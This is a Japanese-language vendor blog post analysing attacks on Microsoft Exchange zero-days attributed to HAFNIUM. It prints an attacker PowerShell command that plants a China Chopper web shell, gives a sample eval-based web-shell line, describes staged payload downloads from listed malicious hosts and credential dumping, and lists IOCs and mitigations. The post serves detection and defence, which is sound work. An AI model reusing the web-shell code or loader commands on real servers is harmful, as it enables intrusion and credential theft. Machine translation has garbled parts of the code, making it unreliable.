• 製品とサービス
        • クラウド

          • エンドポイント保護
          • エンドポイントの検出と応答
          • モバイルデバイス管理
          • BYOD
          • 拡張された検出と応答
          • ゼロトラストネットワークアクセス
          • Data Privacy
        • オンプレミス

          • エンドポイント保護
          • エンドポイントの検出と応答
          • Data Privacy
        • Platform

          • マルウェア分析プラットフォーム
        • ディーラー&卸売

          • SOHOトータルエディション
        • サービス

          • 脅威情報
          • デジタルリスク保護サービス(DRPS)
          • ランサムウェア復旧サービス (RRaaS)
          • DPDPコンプライアンス
          • 管理された検出と応答
  • ソリューション
    • 金融・保険
    • 学位
    • 政府・公共機関
    • 健康
    • ITeS
    • 製造現場
  • 貴社名
    • Seqriteについて
    • リーダーシップ
    • 賞と認定
    • ニュースルーム
  • パートナー
    • パートナープログラム
    • パートナーを探す
    • パートナーになる
  • サポート
  • リソース
    • ブログ
    • ホワイトペーパー
    • データシート
    • ケーススタディ
    • 脅威レポート
    • マニュアル
    • PoV
    • データプライバシーを理解する
    • DPDP対話
情報技術、ネットワーク、サイバーセキュリティに関するブログ | Seqrite Blog
営業担当者へ連絡
  • 製品とサービス
        • クラウド

          • エンドポイント保護
          • エンドポイントの検出と応答
          • モバイルデバイス管理
          • BYOD
          • 拡張された検出と応答
          • ゼロトラストネットワークアクセス
          • Data Privacy
        • オンプレミス

          • エンドポイント保護
          • エンドポイントの検出と応答
          • Data Privacy
        • Platform

          • マルウェア分析プラットフォーム
        • ディーラー&卸売

          • SOHOトータルエディション
        • サービス

          • 脅威情報
          • デジタルリスク保護サービス(DRPS)
          • ランサムウェア復旧サービス (RRaaS)
          • DPDPコンプライアンス
          • 管理された検出と応答
  • ソリューション
    • 金融・保険
    • 学位
    • 政府・公共機関
    • 健康
    • ITeS
    • 製造現場
  • 貴社名
    • Seqriteについて
    • リーダーシップ
    • 賞と認定
    • ニュースルーム
  • パートナー
    • パートナープログラム
    • パートナーを探す
    • パートナーになる
  • サポート
  • リソース
    • ブログ
    • ホワイトペーパー
    • データシート
    • ケーススタディ
    • 脅威レポート
    • マニュアル
    • PoV
    • データプライバシーを理解する
    • DPDP対話
ホーム  /  エンタープライズセキュリティ  / Microsoft Exchange Serverのゼロデイ脆弱性について知っておくべきことすべて
Microsoft Exchange Serverのゼロデイ脆弱性について知っておくべきことすべて
18 5月 2021

Microsoft Exchange Serverのゼロデイ脆弱性について知っておくべきことすべて

著者 プラシャント・ティレカー
プラシャント・ティレカー
エンタープライズセキュリティ

2月XNUMX日、マイクロソフトは、脅威グループ「HAFNIUM」がXNUMXつの ゼロデイ脆弱性 Exchangeサーバーで、Microsoftがアウトオブバンドセキュリティ更新プログラム(CVE-2021-26855、CVE-2021-26857、CVE-2021-26858、CVE-2021-27065)をリリースしました。これにより、攻撃者は有効なアカウント認証情報を知らなくても、メールアカウントにアクセスし、サーバー上でマルウェアを実行できるようになります。

脅威アクターは、Microsoft Exchange CVE-2021-26855 のゼロデイサーバーサイドリクエストフォージェリ(SSRF)脆弱性を悪用しています。これにより、攻撃者は認証を回避し、リモートコード実行が可能になります。

CVE-2021-27065は、認証後の任意のファイル書き込み脆弱性です。この脆弱性は、.aspxという拡張子を持つファイルを作成し、コードを挿入します。攻撃者はこの脆弱性を悪用していました。多くの場合、攻撃者は「China Chopper Web Shell」を侵害されたサーバーにアップロードしていると考えられます。

攻撃チェーン

これらのExchangeサーバーのエクスプロイトには、IOC、Web Shell、またはaspxファイルの侵害を示す指標が付随します。エクスプロイトが成功すると、攻撃者はExchangeサーバーの特定の場所「C:\inetpub\wwwroot\aspnet_client\discover.aspx」にWeb Shellをインストールします。この攻撃では、aspnet_client.aspx、load.aspx、discover.aspx、supp0rt.aspx、acceptable.aspx、error_page.aspx、shell.aspx、logaaa.aspx、dict.aspxなど、一般的な名前のaspxファイルが複数確認されており、オフラインアドレス帳(OAB)ファイルにもWeb Shellが見つかりました。

攻撃者は、Exchangeオフラインアドレス帳のaspxページにコードを挿入し、さらなる攻撃に利用することができます。以下の点が判明しました。 PowerShellの 侵害されたExchangeサーバー上で、疑わしいパラメータを用いて実行されています。このPowerShellコード実行は、脆弱性を悪用してファイルの書き込み/変更が行われていることを示しています。

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -W 隠し -ep バイパス -enc 試してください {$p=”C:\\inetpub\\wwwroot\\aspnet_client\\error.aspx”;

$FileStream=New-ObjectIO.FileStream@($p,[IO.FileMode]::Create); $FileStream.Write([Text.Encoding]::UTF8.GetBytes('外部URL:https://f/
“server”>functionPage_Load(){/*ExchangeService*/eval(Request[“unsafe”],”unsafe”);} '),0,147);if($FileStream){$FileStream.Flush();$FileStream.Dispose();$f=(ls$p);$t=”2015-09-13″;$f.CreationTime=$t;$f.LastAccessTime=$t;$f.LastWriteTime=$t;$f.Attributes=”Readonly”,
「システム」、「隠し」、「インデックスされていないコンテンツ」、「アーカイブ」}} をキャッチします。

 

Webシェル分析

中国のChopper Web Shellは、これらの攻撃で確認されている小さなワンライナースクリプトです。これらのファイルの内容は奇妙で不完全です。その構造には、evalを呼び出すHTTP GETパラメータ引数や、unsafeなどの単語が含まれており、様々な脆弱性が存在します。

例 -

「https://f/ function Page_Load(){eval(Request [“XOrSeMr3kgWUdFf6″],”unsafe”);} ”

OABファイルのExternalUrlフィールドの構文は、HTTPリクエストから変数を取得し、サーバーを介してコマンドラインを実行するようなものです。「https://f/」は適切な構文ではなく、ランダムな文字パラメータがいくつか見られます。これは、コード実行前の認証に使用されるキーです。上記のケースでは、「XOrSeMr3kgWUdFf6」が重要です。OABファイルでは、WhenChangedフィールドでファイルの変更日時を確認できます。

aspxファイルのスクリーンショット-

図1. ASPXファイル

 

ウェブシェルファイルで確認されたスクリプトのバリエーションには、オレンジやアナナスなどの静的な文字列や、ファイル内で使用されているBase64文字列のエンコードが含まれています。検出を回避するために、文字列を分割し、Base64文字列でエンコードするといった複雑な処理が用いられています。

図2. 外部URLのリスト

図3. パスのリスト

 

エクスプロイト後の活動

エクスプロイト発生後、サーバーへの完全なアクセス権を取得するための複数の攻撃試行が開始されたことを確認しています。これには、さまざまなオペレーターがオープンソースのツールや方法を使用してバックドアや多数のマルウェアを埋め込むことが含まれます。

バリアント1:

サーバー上で複数のPowerShellダウンロードが検出されました。最初の PowerShellスクリプト これはbase64でエンコードされたコードで、次のステージをhttp[:]//p.estonine[.]com/p?eからダウンロードします。この次のステージをダウンロードしようとすると、PowerShellスクリプトがダウンロードされることがわかりました。

図4. 最初のPowerShellスクリプト

 

ダウンロードした PowerShell スクリプトは、base64 エンコードされた式と、高度な難読化技術の Zlib 圧縮コードを呼び出す必要があります。

図5. 次の段階のPS

以下のコードにあるスクリプトをデコード・解凍すると、様々なチェックが行われ、MACアドレス、ウイルス対策ソフト、OSバージョン、ドメイン名、ユーザーなどの情報が収集されます。その後、ハンドはミューテックス「Global\PSEXEC」を作成し、プロセス実行に必要な管理者権限があるかどうかを確認します。ccc.logはCNCサーバーへの接続に関するログです。

図6. PowerShellコードステージ2

 

このスクリプトは「http[:]//CDN.chatcdn[.]net」へのアクセスを試みます。このドメインは以前から悪意のあるドメインとして認識されており、以前のDLTMinerの拡散ではPowerShellスクリプトで使用されていました。管理者権限で実行している場合は「p?hig」を、それ以外の場合は「p?low」をダウンロードします。その後、Winnetのスケジュールされたタスクの実行間隔を設定します。サーバーが応答しない場合は、IPアドレス「188.166.162.201」からupdate.pngファイルをダウンロードします。

図7. PowerShellコードステージ2

ダウンロードされたファイルはPowerShellスクリプトであり、高度に難読化されたデータが含まれています。コードをデコードすると、約2MBのスクリプトファイルと膨大なコード行が生成されます。このコードには、SMB経由のエクスプロイトに使用されるオープンソースコードが使用されており、SMBセッションセットアップ要求、SMBセッションログオフ要求、invoke-SMBExec、そしていくつかのラテラルムーブメント手法が利用されていることが確認されました。

図8. PowerShell ステージ3

Base64コードのデコード後、コードをさらに調査したところ、Mimikatzのペイロードに類似したXNUMXつの実行ファイルが見つかりました。これは、アカウントのログイン情報とパスワード情報を取得するために使用される、認証情報ダンプを行うオープンソースプログラムです。取得した認証情報は、ラテラルムーブメント(横方向の移動)や、重要情報や制限された情報へのアクセスに利用されます。

バリアント2:

観察された別のPowerShellスクリプトは、GitHubページからファイル download をダウンロードしようとします。ファイルの拡張子は.pngですが、PE実行ファイルです。

図9. PowerShellスクリプトの亜種2

私たちはこのような PowerShell スクリプトについてさらに調査を進めており、感染チェーンでは Microsoft Exchange サーバーの脆弱性を悪用した興味深い事実がいくつか明らかになる予定です。

 

IOC

Webshel​​lハッシュ PEハッシュ
0CD6F96A3460BE65C70C88A764F6EC56 3547D371C975779D6E0EDDF145936FB1
137E3A611C961EF33AAF49CCAA35E710 8AEA2AE91CC084731A08AA231E79A430
1A06924B507FA9A48E94D8AB819C7E42 9ff2613df0fc30afbc552f40360c37e7
1B18EC3D2B27CE39E83D602CB8BA84FE cad2ee0a2e085a319505c4c4b68b3d2b
1EAC1B6CE217C4BD31E93A3D913AF010 E438712E336982548B884CBFBFEE6C9E
217747243CB1FB9EAF6999284D7B9FCB
3068ECC45C32C24C8FD56FC0CB0A8829
3446CEEE4BEA404ED72E14E154763428
35B332744E614EF07A94FF4AC03B1F1A
35FCA708A86BEE43F068AD53C289963D
3CDBE5DF6383A6604737076F9E97E25A
49A62802887B6CA23FD067B942631698
4D0C46CA88840A2649CD0C8596EA0AF9
50499D3A3F4A072FD2FA3C5C5E651E25
5970381424FB282AD7683431EB38C4B5
5DD588C96A81586EE653BDB80D301A87
65159FE1E1AE21F68CD235A8C045787A
6654AA50456B7D7C10061957DA128EF6
6B2AEC787E30369911265CFA932192F4
6D5F087C1D2E5A98E8EF00FE7883A531
6F5909B3060D0F9AD4C4F4F6EFBAAC27
87DCB5D6CCD2D614C34197915A9ADE15
8B99A15118D4FB563CDEFA97BFEC6BFE
8CBF320BC0E0BE871E04152AFF775238
8D5315AA11C3DBCDDFBA1A8D8D695F6B
93448E9EC4EEDA337879B148475B0E77
94881B3621AF9A4DC64678258364A82B
B82E014EE386C569710A9B03A7294A4C
B86798F8F643CA76F20916C9347AE1C8
BA7235A228BEB5B8D1C630DA46B17E5F
BEE691F207A19D782CCFBE5887B91015
C11680638FFF66F5DD494151D4A77389
CB9BE56C0DA7D625277823C796A10B12
D02AD7D92D348E011F4C63CBA6BA639D
D08194CBB0D72C2609719C8E87D9036D
D2EE996FBFB6ACA47CFD4319543626A3
D70FBE37FA09856158361411624591E7
D8A14C2BC15DC04B0BAE8A992990D41F
DEADBB5A1E9669E268D2C1CC5D9965B0
E6F23A3282C7F0A693433815B4CFFC8F
EDB48532A2AA88558474FFEA64355129
EF374AAB0EFFF9914A83362E0896F651
EFD4DC84D422420E887E6400FECCDDAD
F7D74667839288B659EC1D87217FC749
FBB4182C9A441688FD71996DE7445A6F

ドメイン/IP

  • http[:]//p.estonine[.]com/p?e
  • http[:]//cdn.chatcdn[.]net
  • http[:]//40.115.162.72/89[.]png
  • https[:]//raw.githubusercontent[.]com/eluken890enlk/exmails/main
  • 188.166.162.201
  • 178.21.164.68

 

クイックヒール検出名

  • HTTP/CVE-2021-26855.MES!PT
  • HTTP/MSExchangeServer.SSRF!PT
  • CVE-2021-26855.Webshel​​l

製品概要

脅威アクターは、脆弱な Microsoft Exchange サーバーに対してこれらのゼロデイ脆弱性を悪用し、Exchange サーバーにアクセスしたり制御したりするために、複数のポストエクスプロイト手法を使用するため、最新のセキュリティ更新プログラムでパッチを適用することが不可欠です。

私たち Quick heal は、IPS とファイルベースの検出にこの脆弱性の検出を追加し、すでに侵害されたサーバーと、Web シェルなどの他の IOC の存在を識別しました。

 

緩和

  • すべての Microsoft Exchange サーバーを、Microsoft がリリースした最新のパッチ バージョンに直ちに更新することを強くお勧めします。
  • このような攻撃や悪用から保護するには、環境にセキュリティ製品を導入し、適時に更新することをお勧めします。
  • ベンダーからのセキュリティ パッチを時間どおりに適用する必要性は、システムの保護とセキュリティ確保に役立ちます。
  • サーバーがすでに侵害されている場合は、パッチを適用する前にサーバーをクリーンアップする必要があります。
  • マイクロソフトが共有している以下の緩和ツールは、この脆弱性に対して使用できます。
  • https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/
  • https://github.com/microsoft/CSS-Exchange/tree/main/Security

 以前の投稿従業員にサイバー衛生を確保することがすべての企業にとって重要な理由
次の投稿  Seqrite Endpoint Security が Windows 10 May 2021 Update 21H をサポート
プラシャント・ティレカー

プラシャント・ティレカーについて

Prashant Tilekarは、Quick Heal Security LabsのHIPS(ホストベース侵入防止システム)チームに所属しています。彼はこれまで、様々なセキュリティ脆弱性の調査に取り組んできました。

プラシャント・ティレカールの記事 »

関連記事

  • 現代社会において、スタートアップや企業が備えておくべきサイバーセキュリティの脅威トップ6

    2021 年 12 月 3 日
  • すべての組織にとって、従業員のサイバー衛生を確保することが重要なのはなぜですか?

    2021 年 5 月 12 日
  • 効率的なリモートオペレーションの確立に苦戦するテクノロジー企業

    IT および ITes 企業は、在宅勤務のスタッフによるデータ漏洩の危険性をいつ理解するのでしょうか?

    2020 年 6 月 9 日
注目の著者
  • セクライト
    セクライト

    Seqriteは、エンタープライズ向けサイバーセキュリティソリューションのリーディングプロバイダーです。…

    続きを読む..
  • ジョティ・カルレカー
    ジョティ・カルレカー

    私は、新興テクノロジーに関するコンテンツの作成を楽しむ熱心なライターです。

    続きを読む..
  • ビニーシュ・P
    ビニーシュ・P

    私はサイバーセキュリティに情熱を注ぎ、熱心なライターでもあります。得意分野は…

    続きを読む..
  • サンジェイ・カトカル
    サンジェイ・カトカル

    Sanjay Katkar 氏は、Quick Heal Technologies の共同マネージング ディレクターです。

    続きを読む..
トピック
apt (25) サイバー攻撃 (36) サイバー攻撃 (58) サイバー攻撃 (16) サイバー攻撃 (15) Cybersecurity (335) サイバーセキュリティ (34) サイバー脅威 (33) サイバー脅威 (50) データ侵害 (56) データ侵害 (29) データ損失 (28) データ損失防止 (34) データプライバシー (15) データ保護 (32) データセキュリティ (17) DLP (50) DPDP (14) DPDPA (16) Encryption (16) エンドポイントセキュリティ (110) エンタープライズセキュリティ (18) 悪用する (13) GDPR (13) マルウェア (76) マルウェア分析 (13) マルウェア攻撃 (23) マルウェア攻撃 (12) MDM (27) Microsoft (15) ネットワークセキュリティ (24) パッチ管理 (12) フィッシング詐欺 (29) ランサムウェア (69) ransomware攻撃 (30) ransomware攻撃 (30) ransomwareの保護 (14) セクライト (41) Seqrite暗号化 (27) セクライト EPS (33) Seqriteサービス (16) 脅威情報 (13) UTM (34) 脆弱性 (16) ゼロトラスト (13)
情報技術、ネットワーク、サイバーセキュリティに関するブログ | Seqrite

世界中でクラス最高の脅威防止、検出、対応ソリューションによりエンドポイント、データ、ネットワークのセキュリティを簡素化する、大手エンタープライズ IT セキュリティ ソリューション プロバイダーです。

プロフィール

私たちに従ってください:

ニュースレターに登録

最新のサイバーセキュリティのトレンドと洞察に関する情報を入手してください。

ローディング
製品とサービス
  • クラウド
  • エンドポイント保護
  • エンドポイントの検出と応答
  • モバイルデバイス管理
  • BYOD
  • 拡張された検出と応答
  • ゼロトラストネットワークアクセス
  • Data Privacy
  • オンプレミス
  • エンドポイント保護
  • エンドポイントの検出と応答
  • Data Privacy
  • Platform
  • マルウェア分析プラットフォーム
  • マイクロビジネス
  • SOHOトータルエディション
  • サービス
  • 脅威情報
  • デジタルリスク保護サービス(DRPS)
  • ランサムウェア復旧サービス (RRaaS)
  • DPDPコンプライアンス
  • 管理された検出と応答
リソース
  • ブログ
  • ホワイトペーパー
  • データシート
  • 脅威レポート
  • マニュアル
  • PoV
  • データプライバシーを理解する
  • DPDP対話
  • ポリシーとコンプライアンス
  • EULA
  • ゴーディープ
  • SIA
お問い合わせ
  • 登記事務所
  • 最寄りのオフィス
  • サイバーセキュリティについて話しましょう
サポート
  • テクニカルサポート
  • ソフトウェア・ダウンロード
  • オフラインアップデータ
  • ファームウェア・アップグレード
  • アップグレード
  • 製品ドキュメント
私たちに関しては
  • Seqriteについて
  • リーダーシップ
  • 受賞
  • ニュースルーム
Partner
  • パートナープログラム
  • パートナーを探す
  • パートナーになる
  • Seqrite認定

© 2026 クイックヒールテクノロジーズ株式会社

サイトマップ プライバシーポリシー 法的通知 クッキーポリシー 利用規約